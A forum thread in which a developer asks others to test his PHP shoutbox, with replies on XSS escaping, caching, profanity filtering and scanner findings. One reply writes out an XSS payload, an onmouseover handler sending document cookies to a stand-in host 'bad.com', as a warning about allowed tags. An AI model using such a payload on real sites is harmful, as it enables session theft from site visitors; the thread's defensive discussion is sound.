Try to mess up my Shoutbox

[blufish]

Hello Everyone I just finished a shoutbox script!

 

I would appreciate it If you guys would test it out and try to tell me of any issues or problems it may have!

 

http://www.frozenoven.com/shoutbox/index.php

 

Thanks!

[blufish]

Might I ask who wrote all this random XSS stuff in the Shoutbox? I doesn't look like they did anything (they failed at whatever hacking they were trying to achieve) but I would appreciate it If they would tell me who they are?

[darkfreaks]

wasnt me but that can easily be solved with strip_tags and mysql_real_escape_string 

[blufish]

Yeah what they tried to do didn't work, can you run Acunetix?

How did you pay for that anyway?

Thanks!

[darkfreaks]

uh saved up my money? and sure ill run it later when i get home

[blufish]

thanks!

[darkfreaks]

alert is javascript and as long as you have something like

<?php
htmlentities($string,ENT_QUOTES);?>

 

 

you are fine. it wil print in html like alert whatever instead of actually being a problem

[blufish]

alert is javascript and as long as you have something like

<?php
htmlentities($string,ENT_QUOTES);?>

 

 

you are fine. it wil print in html like alert whatever instead of actually being a problem

If I use strip_tags won't it get rid of JS? I will add htmlentities anyway though.

[darkfreaks]

strip_tags gets rid of both of Javascript and HTML unless you do

 

<?php
strip_tags($string,"allowed tags here");?>

[darkfreaks]

uh whats with your thing? all the html doesnt work now? i think your better off using strip_tags

[blufish]

hmm I see what I did I have fixed now!

I don't see any problems after what you did.

these are some smart hacking tactics.

[darkfreaks]

yes strip_tags avoids javascript injection just delete all those entries.

[blufish]

The page looks different with in IE than Safari, IE doesn't have alot of the post in the main part of the shoutbox.  Don't know why.

[darkfreaks]

its still a good idea to delete them.

[blufish]

its still a good idea to delete them.

Yes I deleted them IE is functioning properly after I restarted it.

 

Edit: IE isn't getting the new messages. will try getting rid of htmlentities.

Edit: IE still doesn't get the new messages... something is wrong.

[blufish]

hmm... IE is now caching my php pages.  That's not supposed to happen.  Any ideas on how to stop this?

[blufish]

Fixed, told it not to cache the page.

[natbob]

a note if you use strip tags,

if you allow even the <b> or <i> tags, somone can still put

<b onmouseover="javascript:document.location='http://www.bad.com/cookiemonster?cookies='+document.cookies;">Hover Here!</b>

I find that a good solution is to allow <b>, <i>, etc but to also escape the quotes to " so that a user can use <b> but not <b onmouseover="bad">

[spasme]

You might want to use some script to empty the field value (name field) once the user clicks to type in his/her nickname

 

JS

<!-- Form Input Default Value -->
<script type="text/javascript">
function clickclear(thisfield, defaulttext) {
if (thisfield.value == defaulttext) {
thisfield.value = "";
}
}

function clickrecall(thisfield, defaulttext) {
if (thisfield.value == “”) {
thisfield.value = defaulttext;
}
}
</script>

 

example:

<input type="text" name="myfield" value="default text" onclick=”clickclear(this, ‘default text’)” onblur=”clickrecall(this,’default text’)” />

[nrg_alpha]

I would use preg expressions to filter out profanity against potty mouthed visitors.

 

Cheers,

 

NRG

[unsider]

I'll try a few more later, but I tested the typical "stretchdatpagewidafatdick", and apparently you need to make use of word wrap.

[darkfreaks]

Input Type Password Autocomplete Enabled

Password type input named pass from unnamedd has autocomplete enabled. An attacker with local access could obtain the cleartext password from the browser cache.

The impact of this vulnerability

Possible sensitive information disclosure

How to fix this vulnerability

The password autocomplete should be disabled in sensitive applications. To disable autocomplete, you may use a code similar to: < INPUT TYPE="password" AUTOCOMPLETE="off" >

 

User credentials are sent in clear text

The impact of this vulnerability

A third party may be able to read the user credentials by intercepting an unencrypted HTTP connection.

How to fix this vulnerability

Because user credentials usually are considered sensitive information, it is recommended to be sent to the server over an encrypted connection.